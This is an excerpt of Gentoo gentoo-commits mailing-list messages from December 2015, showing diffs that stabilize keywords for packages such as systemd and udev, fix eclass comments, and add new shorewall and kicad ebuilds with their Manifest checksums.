--- a/sys-apps/systemd/systemd-226-r2.ebuild
+++ b/sys-apps/systemd/systemd-226-r2.ebuild
@@ -9,7 +9,7 @@ if [[ ${PV} ==  ]]; then
inherit git-r3
 else
SRC_URI="https://github.com/systemd/systemd/archive/v${PV}.tar.gz -> 
${P}.tar.gz"
-   KEYWORDS="~alpha ~amd64 ~arm ~ia64 ~ppc ~ppc64 ~sparc ~x86"
+   KEYWORDS="~alpha amd64 ~arm ~ia64 ~ppc ~ppc64 ~sparc ~x86"
 fi
 
 inherit autotools bash-completion-r1 linux-info multilib \



[gentoo-commits] repo/gentoo:master commit in: dev-php/PEAR-Mail_Mime/

2015-12-14 Thread Agostino Sarubbo
commit: df522da021e28e3d915fd3019925ced64840249f
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:15:14 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:15:14 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=df522da0

dev-php/PEAR-Mail_Mime: alpha/arm/hppa/ia64/ppc64/ppc/sparc/x86 stable, 
(ALLARCHES policy) wrt bug #567994

Package-Manager: portage-2.2.24
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild 
b/dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild
index 191bf99..8f073e6 100644
--- a/dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild
+++ b/dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild
@@ -10,7 +10,7 @@ DESCRIPTION="Provides classes to deal with creation and 
manipulation of mime mes
 
 LICENSE="BSD"
 SLOT="0"
-KEYWORDS="~alpha amd64 ~arm ~hppa ~ia64 ~ppc ~ppc64 ~s390 ~sh ~sparc ~x86"
+KEYWORDS="alpha amd64 arm hppa ia64 ppc ppc64 ~s390 ~sh sparc x86"
 IUSE=""
 
 DEPEND=">=dev-lang/php-5.0:*"



[gentoo-commits] repo/gentoo:master commit in: eclass/

2015-12-14 Thread Brian Evans
commit: 2341237bf13fea1d22e3e84e2140e8635da9bfbf
Author: Brian Evans  gentoo  org>
AuthorDate: Mon Dec 14 15:02:22 2015 +
Commit: Brian Evans  gentoo  org>
CommitDate: Mon Dec 14 15:03:50 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=2341237b

mysql-multilib-r1.eclass: Adjust documentation comments wrt bug 568240

Signed-off-by: Brian Evans  gentoo.org>

 eclass/mysql-multilib-r1.eclass | 7 ---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/eclass/mysql-multilib-r1.eclass b/eclass/mysql-multilib-r1.eclass
index 082f65a..0cd841a 100644
--- a/eclass/mysql-multilib-r1.eclass
+++ b/eclass/mysql-multilib-r1.eclass
@@ -510,7 +510,7 @@ multilib_src_compile() {
 }
 
 
-# @FUNCTION: mysql-multilib_src_install
+# @FUNCTION: mysql-multilib-r1_src_install
 # @DESCRIPTION:
 # Install mysql.
 mysql-multilib-r1_src_install() {
@@ -621,8 +621,9 @@ multilib_src_install() {
fi
 }
 
-# @FUNCTION: mysql-multilib_pkg_preinst
+# @FUNCTION: mysql-multilib-r1_pkg_preinst
 # @DESCRIPTION:
+# Warn about ABI changes when switching providers
 mysql-multilib-r1_pkg_preinst() {
debug-print-function ${FUNCNAME} "$@"
 
@@ -739,7 +740,7 @@ mysql-multilib-r1_getoptval() {
"${mypd}" $extra_options $section | sed -n "/^${flag}/s,${flag},,gp"
 }
 
-# @FUNCTION: mysql-multilib_pkg_config
+# @FUNCTION: mysql-multilib-r1_pkg_config
 # @DESCRIPTION:
 # Configure mysql environment.
 mysql-multilib-r1_pkg_config() {



[gentoo-commits] repo/gentoo:master commit in: sys-fs/udev/

2015-12-14 Thread Agostino Sarubbo
commit: 931e7779c4333808bc2a9ee01a50a635d446618c
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:13:40 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:13:40 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=931e7779

sys-fs/udev: x86 stable wrt bug #568082

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 sys-fs/udev/udev-225.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sys-fs/udev/udev-225.ebuild b/sys-fs/udev/udev-225.ebuild
index 3264435..f73638f 100644
--- a/sys-fs/udev/udev-225.ebuild
+++ b/sys-fs/udev/udev-225.ebuild
@@ -17,7 +17,7 @@ else

https://dev.gentoo.org/~ssuominen/${P}-patches-${patchset}.tar.xz

https://dev.gentoo.org/~williamh/dist/${P}-patches-${patchset}.tar.xz;
fi
-   KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 
~s390 ~sh ~sparc ~x86"
+   KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 
~s390 ~sh ~sparc x86"
 fi
 
 DESCRIPTION="Linux dynamic and persistent device naming support (aka userspace 
devfs)"



[gentoo-commits] repo/gentoo:master commit in: virtual/libgudev/

2015-12-14 Thread Agostino Sarubbo
commit: ec6d8861a4d9a20d9e837d38b09f2146a33eb535
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:13:32 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:13:32 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=ec6d8861

virtual/libgudev: x86 stable wrt bug #568082

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 virtual/libgudev/libgudev-230.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/virtual/libgudev/libgudev-230.ebuild 
b/virtual/libgudev/libgudev-230.ebuild
index e2b3dbd..1b89b07 100644
--- a/virtual/libgudev/libgudev-230.ebuild
+++ b/virtual/libgudev/libgudev-230.ebuild
@@ -11,7 +11,7 @@ SRC_URI=""
 
 LICENSE=""
 SLOT="0/0"
-KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 ~s390 
~sh ~sparc ~x86"
+KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 ~s390 
~sh ~sparc x86"
 IUSE="introspection static-libs"
 
 DEPEND=""



[gentoo-commits] repo/gentoo:master commit in: sys-fs/udev/

2015-12-14 Thread Agostino Sarubbo
commit: f750e121050c6947ae55125ea8603c25e3642204
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:09:44 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:09:44 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=f750e121

sys-fs/udev: amd64 stable wrt bug #568082

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 sys-fs/udev/udev-225.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sys-fs/udev/udev-225.ebuild b/sys-fs/udev/udev-225.ebuild
index d173c0f..3264435 100644
--- a/sys-fs/udev/udev-225.ebuild
+++ b/sys-fs/udev/udev-225.ebuild
@@ -17,7 +17,7 @@ else

https://dev.gentoo.org/~ssuominen/${P}-patches-${patchset}.tar.xz

https://dev.gentoo.org/~williamh/dist/${P}-patches-${patchset}.tar.xz;
fi
-   KEYWORDS="~alpha ~amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 
~s390 ~sh ~sparc ~x86"
+   KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 
~s390 ~sh ~sparc ~x86"
 fi
 
 DESCRIPTION="Linux dynamic and persistent device naming support (aka userspace 
devfs)"



[gentoo-commits] repo/gentoo:master commit in: net-firewall/shorewall/

2015-12-14 Thread Ian Delaney
commit: 415c35cc995bd8b4370792858aefa94eadde7295
Author: Thomas D  whissi  de>
AuthorDate: Fri Dec 11 11:58:17 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Fri Dec 11 11:58:17 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=415c35cc

net-firewall/shorewall: Bumped to v5.0.2.1

EBuild changes:

- Fixed description to satisfy repoman.

 net-firewall/shorewall/Manifest |   7 +
 net-firewall/shorewall/shorewall-5.0.2.1.ebuild | 446 
 2 files changed, 453 insertions(+)

diff --git a/net-firewall/shorewall/Manifest b/net-firewall/shorewall/Manifest
index 52f2606..41c5dd0 100644
--- a/net-firewall/shorewall/Manifest
+++ b/net-firewall/shorewall/Manifest
@@ -2,27 +2,34 @@ DIST shorewall-4.6.10.1.tar.bz2 496061 SHA256 
de527474f5bac6bf59678321c604748c48
 DIST shorewall-4.6.13.1.tar.bz2 498949 SHA256 
fc2c390fecbc0c78d5cd648596abc1edb1d338d748b4a0605695c3141e24d35e SHA512 
1b8e0a008660a8b66bcc77bb92f110fbdc04a0925d6f19bb01a6e798baa907f5ca4f6f60851c861963ab49b1a0b2ae652d4d1234fcf18ab56325ebcc66fbefb1
 WHIRLPOOL 
6c2a63a5c547d429c3d9c5d05683d8c4a2bdc662f58b7b8e7ae197053a13c06ad1c0ae9fcd0face2601d05a7becfaf0948e0765ff22e5dbeace0176e77e4bad6
 DIST shorewall-4.6.13.tar.bz2 500076 SHA256 
fc4530d891da22d9efaa4339f10ebde27133bef9fe8c6e93abc701991f8b30ba SHA512 
5018d34a15784870c521614a725baa05ea8df5e11e11d0177d01fc3012ed006f25b6a2afaf20cbae7b1c189ea841cc5ad2764067af0513f8378b316645524b48
 WHIRLPOOL 
a6fef96deed7f7ad7bdc0273de88c15f77b901ec27905af474399b3b86fd8b6cdfe92556ae2314feaa73cd525960b56d986ce426225f7779e9235ccdc9f7248c
 DIST shorewall-5.0.1.1.tar.bz2 476999 SHA256 
9f42005c4a48f051b356c109ac48f05bf1f63c03c08a30fd7fcfb2a8c737 SHA512 
77fb253ec2d83ea8bbe380a3d56fa6a17298f05fd0cb820df7149c5ea4d7756604d3d2a195ad951289dccce914b660af151a8994bf40ed0915a6f1495e6b
 WHIRLPOOL 
68f7e0cbf6c631bc408daf1f26a06e6ec3e77122d824a42336b6eaaeb72437a827338817ae5c159b0a2e66f74855bdc1fd9a22dc17895c5874fccd2b0459
+DIST shorewall-5.0.2.1.tar.bz2 478874 SHA256 
10136cf586b620abdad1f3c716f03d1160cfa65c8461fba42d858fa1ab8d5856 SHA512 
54589366a7743b9e8035a13b83a77e80a319531e07c803fd88ea31d2023445b9a63b99e0ad030997f43cb49050dfc4b0c94af2ec6c6631249fc1a2354d5565c1
 WHIRLPOOL 
559f916008b04c6779b50185e123274c8a20994c3ade58789ee840c5d9e13c7dba3e0885b3babd7a187aeb19a25b4ea8a6e151270fed3f363ce4d14d0fe749fc
 DIST shorewall-core-4.6.10.1.tar.bz2 58247 SHA256 
5af804f39f4480685e995080dc8913d4af61af70d5a478dd00bbf0593851b44d SHA512 
1028e0bf950aecbc77c6c263ab8351fb8ff90b6077a0d6bf7c0d882559f5d8644ce0f2c6aec6dd3614d90a319277763460909e345e1e004cf8ea1f548e369284
 WHIRLPOOL 
0a0834eb355e05679b5809a18dd0749c6c06ac3130a9ab375587c7e6134042c01762775ac136f0396c051f4ac4b2f379141d111760929a42da6f00656a96e120
 DIST shorewall-core-4.6.13.1.tar.bz2 61749 SHA256 
d06a4c1050578013c6e37468f0a803fd129f1ac95b6ea5ab8af80f3eb0739539 SHA512 
8db64a150101368ad50075f7ed97e2ceecf0d974ae1d0d61f6bc8dd967ff8f65c543dfbe8f1217d90b21d93398669cc3d6e06a2b2c706c25347b27f13868
 WHIRLPOOL 
493f9a739388d3ecfe5fc9d04414c272d09a6eade8f236e21ec773b7df423844d2b9b427a297c9fa842ef22e7c491427d74e83dbc0aa267b16c20c1aff8525ed
 DIST shorewall-core-4.6.13.tar.bz2 61679 SHA256 
e31dd55c8df37ee2168c5aa9843f9c2727f6a31a98634445e0c10990360665a4 SHA512 
2c769f2f77ee51357f92daa1fe3f794fd3e3b537f0686a004809767340ad7bdd922be2580760cdbb834e8c80f53e9d5329ef86ee741520870c242452b1e44f30
 WHIRLPOOL 
90668efd2db2f09bf40934206b3124666b96157f085dfabc17ff2c2d65ebb8f348db6727516fced866d16eb4d44aa0ea9d6d91ed907593785788c6cdb50f10dc
 DIST shorewall-core-5.0.1.1.tar.bz2 46363 SHA256 
4501a4c7d4d8e7572f5b23e988736740e5da477277f1e636ed9a9dbd2e874457 SHA512 
f127c4056d64c1bbc36d3e5a61e12829ef687d0c37c3a277c6a51c8e57b787187246201f293ea65414e057967eabc5601b81d2154b780eca572ab0c64cfeb75d
 WHIRLPOOL 
777e8e84eef4ddcd54c1db36bb394cf35b724ebd988f2c86158cfcfeb7fba544279386e98ad897f58690b6cf8ac684a385c3fe42d8f2c498b1fcfd89ade0a20b
+DIST shorewall-core-5.0.2.1.tar.bz2 47922 SHA256 
8be30270e527c7697c365c437bff07e6a41ccdcf28b7163b2866750158e5845d SHA512 
bf614cc73bc321c46b0825deb198943ce3a37a6e1b5dc5f2b9be17799409de9909219dec327c493a8382111cc9b7e7319c15effd84b238bee85ed9b6f0281100
 WHIRLPOOL 
5e415c8fb17edb96978cd3f8811fdd0953de556efe3cb6e5b1e9abe98535f905119eb968dadb65b3a525801c49af1fdbabc3b3e7eb06364c420323be6eeecb51
 DIST shorewall-docs-html-4.6.10.1.tar.bz2 4185752 SHA256 
eeaec18b7f8663f0b836b76d140d3fad7871075de90f18ccc7b9fbda1538a787 SHA512 
1bf1b3f5745d54af3af5f9bb6417c661e2bde8028d699aed4c4fcbe7cf301b8eadfed7be5e9bfdd677659c362d1e757eee13cd1b497a0c6837c179883c33e3a8
 WHIRLPOOL 
937fc4f76174f615de86eaa08690ebbe42f658154320d3e9972cbb0bcaa461e11fdaf5390f517f5d2f905aa5996ecb7399ca07d1767f647a49d33b1220e8d547
 DIST shorewall-docs-html-4.6.13.1.tar.bz2 4280904 SHA256 
ded94cd41022855bbb20e3a5a579f82515fea8eb3d6b7ea110e491a5cc654804 SHA512 

[gentoo-commits] repo/gentoo:master commit in: sci-electronics/kicad/

2015-12-14 Thread Ian Delaney
commit: 46e74c9a4bc76f8bff83c10aea59f8eab25236b6
Author: Zoltan Puskas  sinustrom  info>
AuthorDate: Sun Dec 13 22:43:48 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Sun Dec 13 22:44:41 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=46e74c9a

sci-electronics/kicad: Bump to new stable release 4.0.1

Gentoo-Bug: #568088

 sci-electronics/kicad/Manifest   |   3 +
 sci-electronics/kicad/kicad-4.0.1.ebuild | 185 +++
 2 files changed, 188 insertions(+)

diff --git a/sci-electronics/kicad/Manifest b/sci-electronics/kicad/Manifest
index 6f175d7..4fb1699 100644
--- a/sci-electronics/kicad/Manifest
+++ b/sci-electronics/kicad/Manifest
@@ -7,3 +7,6 @@ DIST kicad-4.0.0_rc1-i18n.tar.gz 1959024 SHA256 
5fbd037e4a76a83ed6be7554ab1add98
 DIST kicad-4.0.0_rc1-library.tar.gz 87967616 SHA256 
09a9e184e19b6072efdc00fabb65e3c0d498858c17f5fa5ce8d255b21eab3db4 SHA512 
f611015a8760d3c9cf26fd99a043d69fa75d398fb287af7e6fe7cfbd70d3ff1aa67abcedeffa00fef60434e3944ac6b59fa4ac9ea50097d910fbabcb6f288165
 WHIRLPOOL 
83585bbc772da122139dfa643c4045bfef207ea8dbc4a83a5458be6227ff976fe9c48cea2388f9ec0b20e7c697579701b75231b852161b33a9c51ddef480c6f4
 DIST kicad-4.0.0_rc2-i18n.tar.gz 2230967 SHA256 
1c0db5a10f81855b4270aff3add5914aebda86c6d492d64968a853bb71ba0126 SHA512 
2877a5045183bf81544912a843ad4493c4ede998c71087d56ec68f0cb618427b9589fcdbf26ed0412eceec4dee5fa7ea7cf278f211f5e1eea39620283dd8a747
 WHIRLPOOL 
d37d058a1de14668144d734a4079043dff39a593d24039c806da890d34df6064d33e308f21fee815b39ee7e6fca41afa810f76b859e0bd4ec17783bfb8ee81d2
 DIST kicad-4.0.0_rc2-library.tar.gz 105100251 SHA256 
bed03fd9beacb509c4087c17e69c4d148d7ad991405677b523906c1b1f04caa5 SHA512 
f5bc5fb1c7cb5f0f5a83b105a190add944c9c8eaecbaae278edb372badc173dba856ea450e77f7d680ee174f3392ebbf8b6b2b80fea9e0efc0228e05655496ba
 WHIRLPOOL 
43f8358be85e3af5e6ea28ab81f208aa32b85fa5e7f692a92579094f1731bdb5c59db31107dc56d9c407658022dfc2cd446c625ca54f020d3908a5422ca290d5
+DIST kicad-4.0.1-i18n.tar.gz 2273300 SHA256 
646f2f394046543be9fd57b2b5fc01f1869b4879958fc13a29f60b3502b7ca30 SHA512 
56c87f94bb8c3a1f92dee6a5d88fe0a7d6778110cf1fbd019e7481fa89d0d3df447eb90d49f7621dd7006a4e23ce16f752eeba368057d4d970e280c77e22cc25
 WHIRLPOOL 
3a592d6c59da763dd554ebf85f9d627da58fb6ca38c435712742e0e58ab60bb59ec6c6b5757e651c7c1656ea23153237d236d680a3f3276ef1e1d4b29b24f413
+DIST kicad-4.0.1-library.tar.gz 105054096 SHA256 
4d1ec105a422a0130be02f4d712d5c22ab223a7963f2b98e75b6847254269e46 SHA512 
88b9d31230ac85e4b4341b0b2194d6fc622c03d62e80c65d82d999e02324d902ce90881fd5592bde9e8c2695370cb0c35e8e4473f640d1a25eddf453637b6b6f
 WHIRLPOOL 
50cce4a0147982f8693009833831a3876c987ea24be938ed51a39d823935d424fbe7940b6f7565c42a318b4e71c24c31f8b0fcbfd5e63db247856312a775001b
+DIST kicad-4.0.1.tar.xz 10837804 SHA256 
73a9f8713ba93ce34e5f9c26e9667f33a22f4e33192fa6bd15d3fc0edea54bde SHA512 
da9d5ba7f6a323d80621304e368c9783febedf7c545f31a6ca69bddc8573e7c7aa127c774cc29e173eae947debd444b5a04b0483800d6c0d1303e32a714e3d26
 WHIRLPOOL 
0985d7b38df1224787b0509407f34043d71f4eac847486bf4633cacb9c3bc32df9590c0516e3189e4b0f5ba17fde93ead467e200e95ecb763f7054cc1baac107

diff --git a/sci-electronics/kicad/kicad-4.0.1.ebuild 
b/sci-electronics/kicad/kicad-4.0.1.ebuild
new file mode 100644
index 000..7ee1b62
--- /dev/null
+++ b/sci-electronics/kicad/kicad-4.0.1.ebuild
@@ -0,0 +1,185 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI="5"
+PYTHON_COMPAT=( python2_7 )
+
+WX_GTK_VER="3.0"
+
+inherit cmake-utils fdo-mime flag-o-matic gnome2-utils python-single-r1 
vcs-snapshot wxwidgets versionator
+
+DESCRIPTION="Electronic Schematic and PCB design tools."
+HOMEPAGE="http://www.kicad-pcb.org;
+
+SERIES=$(get_version_component_range 1-2)
+
+SRC_URI="https://launchpad.net/${PN}/${SERIES}/${PV}/+download/${P}.tar.xz
+   !minimal? ( https://github.com/KiCad/${PN}-library/archive/${PV}.tar.gz 
-> ${P}-library.tar.gz )
+   i18n? ( https://github.com/KiCad/${PN}-i18n/archive/${PV}.tar.gz -> 
${P}-i18n.tar.gz )"
+
+LICENSE="GPL-2"
+SLOT="0"
+KEYWORDS="~amd64 ~x86"
+IUSE="debug doc examples github i18n minimal python webkit"
+LANGS="bg ca cs de el es fi fr hu it ja ko nl pl pt ru sk sl sv zh_CN"
+for lang in ${LANGS} ; do
+   IUSE="${IUSE} linguas_${lang}"
+done
+unset lang
+
+REQUIRED_USE="
+   github? ( webkit )
+   python? ( ${PYTHON_REQUIRED_USE} )"
+
+CDEPEND="x11-libs/wxGTK:${WX_GTK_VER}[X,opengl,webkit?]
+   python? (
+   dev-python/wxpython:${WX_GTK_VER}[opengl,${PYTHON_USEDEP}]
+   ${PYTHON_DEPS}
+   )
+   >=dev-libs/boost-1.56[context,nls,threads,python?]
+   github? ( dev-libs/openssl:0 )
+   media-libs/glew
+   media-libs/freeglut
+   media-libs/mesa
+   sys-libs/zlib
+   x11-libs/cairo"
+DEPEND="${CDEPEND}
+   app-arch/xz-utils
+   doc? ( app-doc/doxygen )
+   i18n? ( 

[gentoo-commits] repo/gentoo:master commit in: /

2015-12-14 Thread Ian Delaney
commit: 1506b667bf9cd22b6b6a6c9ae08e083ead870e93
Author: Ian Delaney  gentoo  org>
AuthorDate: Tue Dec 15 04:00:59 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Tue Dec 15 04:45:24 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=1506b667

Merge remote-tracking branch 'remotes/Whissi/shorewall-5.0.2.1-bump'

 net-firewall/shorewall/Manifest| 14 +++---
 .../{shorewall-5.0.1.1.ebuild => shorewall-5.0.2.1.ebuild} |  3 +--
 2 files changed, 8 insertions(+), 9 deletions(-)



[gentoo-commits] repo/gentoo:master commit in: /

2015-12-14 Thread Ian Delaney
commit: 513971b31dc0591b3270e62597dc2fd65bd793d7
Author: Ian Delaney  gentoo  org>
AuthorDate: Tue Dec 15 04:36:37 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Tue Dec 15 04:45:27 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=513971b3

Merge remote-tracking branch 'remotes/zpuskas/kicad-doc-4.0.1'

Pull request: https://github.com/gentoo/gentoo/pull/471

 app-doc/kicad-doc/Manifest   | 1 +
 app-doc/kicad-doc/{kicad-doc-4.0.0.ebuild => kicad-doc-4.0.1.ebuild} | 0
 2 files changed, 1 insertion(+)



[gentoo-commits] repo/gentoo:master commit in: net-firewall/shorewall/

2015-12-14 Thread Ian Delaney
commit: 379bb526a486b250786472260e43a29bfa68ae8d
Author: Thomas D  whissi  de>
AuthorDate: Fri Dec 11 11:59:17 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Fri Dec 11 11:59:17 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=379bb526

net-firewall/shorewall: Dropped v5.0.1.1 in favor of new v5.0.2.1

Because additional version numbers have been removed from configuration
files and macros I won't stabilize v5.0.1.1 so people going from v4.x to v5.x 
only
have to update headers once.

 net-firewall/shorewall/Manifest |   7 -
 net-firewall/shorewall/shorewall-5.0.1.1.ebuild | 447 
 2 files changed, 454 deletions(-)

diff --git a/net-firewall/shorewall/Manifest b/net-firewall/shorewall/Manifest
index 41c5dd0..62e78ea 100644
--- a/net-firewall/shorewall/Manifest
+++ b/net-firewall/shorewall/Manifest
@@ -1,35 +1,28 @@
 DIST shorewall-4.6.10.1.tar.bz2 496061 SHA256 
de527474f5bac6bf59678321c604748c48efe28a897d339a2187a45e3efed8ef SHA512 
a5ef4783ff04b6faaa2e25d1da57ca3c46860960859dad5cd3b8d3cb252626b1db39c35767b226333f10db7b08b0fb18c0c09cd4eaf14586cb02b1a4259b571d
 WHIRLPOOL 
26ebb72e769d5ca7489f718cabdb1f9cfb78e2acd514329c7036edcafe27f159ffa4cdadeeb1cee43619f748474fcc7a614011147976abb14cf627503a542e3f
 DIST shorewall-4.6.13.1.tar.bz2 498949 SHA256 
fc2c390fecbc0c78d5cd648596abc1edb1d338d748b4a0605695c3141e24d35e SHA512 
1b8e0a008660a8b66bcc77bb92f110fbdc04a0925d6f19bb01a6e798baa907f5ca4f6f60851c861963ab49b1a0b2ae652d4d1234fcf18ab56325ebcc66fbefb1
 WHIRLPOOL 
6c2a63a5c547d429c3d9c5d05683d8c4a2bdc662f58b7b8e7ae197053a13c06ad1c0ae9fcd0face2601d05a7becfaf0948e0765ff22e5dbeace0176e77e4bad6
 DIST shorewall-4.6.13.tar.bz2 500076 SHA256 
fc4530d891da22d9efaa4339f10ebde27133bef9fe8c6e93abc701991f8b30ba SHA512 
5018d34a15784870c521614a725baa05ea8df5e11e11d0177d01fc3012ed006f25b6a2afaf20cbae7b1c189ea841cc5ad2764067af0513f8378b316645524b48
 WHIRLPOOL 
a6fef96deed7f7ad7bdc0273de88c15f77b901ec27905af474399b3b86fd8b6cdfe92556ae2314feaa73cd525960b56d986ce426225f7779e9235ccdc9f7248c
-DIST shorewall-5.0.1.1.tar.bz2 476999 SHA256 
9f42005c4a48f051b356c109ac48f05bf1f63c03c08a30fd7fcfb2a8c737 SHA512 
77fb253ec2d83ea8bbe380a3d56fa6a17298f05fd0cb820df7149c5ea4d7756604d3d2a195ad951289dccce914b660af151a8994bf40ed0915a6f1495e6b
 WHIRLPOOL 
68f7e0cbf6c631bc408daf1f26a06e6ec3e77122d824a42336b6eaaeb72437a827338817ae5c159b0a2e66f74855bdc1fd9a22dc17895c5874fccd2b0459
 DIST shorewall-5.0.2.1.tar.bz2 478874 SHA256 
10136cf586b620abdad1f3c716f03d1160cfa65c8461fba42d858fa1ab8d5856 SHA512 
54589366a7743b9e8035a13b83a77e80a319531e07c803fd88ea31d2023445b9a63b99e0ad030997f43cb49050dfc4b0c94af2ec6c6631249fc1a2354d5565c1
 WHIRLPOOL 
559f916008b04c6779b50185e123274c8a20994c3ade58789ee840c5d9e13c7dba3e0885b3babd7a187aeb19a25b4ea8a6e151270fed3f363ce4d14d0fe749fc
 DIST shorewall-core-4.6.10.1.tar.bz2 58247 SHA256 
5af804f39f4480685e995080dc8913d4af61af70d5a478dd00bbf0593851b44d SHA512 
1028e0bf950aecbc77c6c263ab8351fb8ff90b6077a0d6bf7c0d882559f5d8644ce0f2c6aec6dd3614d90a319277763460909e345e1e004cf8ea1f548e369284
 WHIRLPOOL 
0a0834eb355e05679b5809a18dd0749c6c06ac3130a9ab375587c7e6134042c01762775ac136f0396c051f4ac4b2f379141d111760929a42da6f00656a96e120
 DIST shorewall-core-4.6.13.1.tar.bz2 61749 SHA256 
d06a4c1050578013c6e37468f0a803fd129f1ac95b6ea5ab8af80f3eb0739539 SHA512 
8db64a150101368ad50075f7ed97e2ceecf0d974ae1d0d61f6bc8dd967ff8f65c543dfbe8f1217d90b21d93398669cc3d6e06a2b2c706c25347b27f13868
 WHIRLPOOL 
493f9a739388d3ecfe5fc9d04414c272d09a6eade8f236e21ec773b7df423844d2b9b427a297c9fa842ef22e7c491427d74e83dbc0aa267b16c20c1aff8525ed
 DIST shorewall-core-4.6.13.tar.bz2 61679 SHA256 
e31dd55c8df37ee2168c5aa9843f9c2727f6a31a98634445e0c10990360665a4 SHA512 
2c769f2f77ee51357f92daa1fe3f794fd3e3b537f0686a004809767340ad7bdd922be2580760cdbb834e8c80f53e9d5329ef86ee741520870c242452b1e44f30
 WHIRLPOOL 
90668efd2db2f09bf40934206b3124666b96157f085dfabc17ff2c2d65ebb8f348db6727516fced866d16eb4d44aa0ea9d6d91ed907593785788c6cdb50f10dc
-DIST shorewall-core-5.0.1.1.tar.bz2 46363 SHA256 
4501a4c7d4d8e7572f5b23e988736740e5da477277f1e636ed9a9dbd2e874457 SHA512 
f127c4056d64c1bbc36d3e5a61e12829ef687d0c37c3a277c6a51c8e57b787187246201f293ea65414e057967eabc5601b81d2154b780eca572ab0c64cfeb75d
 WHIRLPOOL 
777e8e84eef4ddcd54c1db36bb394cf35b724ebd988f2c86158cfcfeb7fba544279386e98ad897f58690b6cf8ac684a385c3fe42d8f2c498b1fcfd89ade0a20b
 DIST shorewall-core-5.0.2.1.tar.bz2 47922 SHA256 
8be30270e527c7697c365c437bff07e6a41ccdcf28b7163b2866750158e5845d SHA512 
bf614cc73bc321c46b0825deb198943ce3a37a6e1b5dc5f2b9be17799409de9909219dec327c493a8382111cc9b7e7319c15effd84b238bee85ed9b6f0281100
 WHIRLPOOL 
5e415c8fb17edb96978cd3f8811fdd0953de556efe3cb6e5b1e9abe98535f905119eb968dadb65b3a525801c49af1fdbabc3b3e7eb06364c420323be6eeecb51
 DIST shorewall-docs-html-4.6.10.1.tar.bz2 4185752 SHA256 
eeaec18b7f8663f0b836b76d140d3fad7871075de90f18ccc7b9fbda1538a787 SHA512 

[gentoo-commits] repo/gentoo:master commit in: /

2015-12-14 Thread Ian Delaney
commit: e80206e9af3c6fe069a4999abfa4d916bd74179c
Author: Ian Delaney  gentoo  org>
AuthorDate: Tue Dec 15 04:43:05 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Tue Dec 15 04:45:29 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=e80206e9

Merge remote-tracking branch 'remotes/zpuskas/kicad-4.0.1'

Pull request: https://github.com/gentoo/gentoo/pull/472

 sci-electronics/kicad/Manifest   | 3 +++
 sci-electronics/kicad/{kicad-4.0.0.ebuild => kicad-4.0.1.ebuild} | 2 ++
 2 files changed, 5 insertions(+)



[gentoo-commits] repo/gentoo:master commit in: app-doc/kicad-doc/

2015-12-14 Thread Ian Delaney
commit: 62aa2af14b0ee15c40c50f62dd9f91a696275e74
Author: Zoltan Puskas  sinustrom  info>
AuthorDate: Sun Dec 13 23:48:56 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Sun Dec 13 23:49:23 2015 +
